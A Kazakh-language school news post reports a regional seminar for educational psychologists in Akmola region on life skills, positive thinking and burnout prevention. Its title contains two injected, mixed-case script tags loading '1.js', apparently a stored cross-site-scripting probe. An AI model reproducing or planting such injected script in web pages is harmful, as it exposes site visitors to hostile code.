Педагог-психологтарға арналған облыстық аймақтық семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.04.2024

«Ақмола облысы білім басқармасының Біржан сал ауданы бойынша білім бөлімінің Үлгі ауылының жалпы орта мектебі» КММ базасында Бурабай, Бұланды, Біржан сал  аудандары мен Степногорск қаласының  педагог- психологтері  үшін «Тұрақты өмірлік дағдыларды қалыптастыру- білім беру үдерісіне қатысушылардың әл-ауқатының факторы» атты облыстық аймақтық семинар өтті. Семинар барысында әдіскерлер мен педагог- психологтер   білім беру ұйымдарындағы педагог- психологтерінің қызметін әдістемелік қамтамасыз ету туралы мәселелерін талқылады. Практикалық бөлімде семинарға қатысушылар педагог- психологтермен позитивті ойлауды дамыту, оқушылар бойында тұрақты өмірлік дағдыларды қалыптастыру, кәсіби эмоционалдық стресс синдромының алдын алу, сонымен қатар педагогтердің психологиялық салауаттылығы бойынша тренинг сабақтары мен ойын жаттығуларды өткізді.

Просмотров: 7125


Пікір қосу



Деректерді қолтаңбаға қосу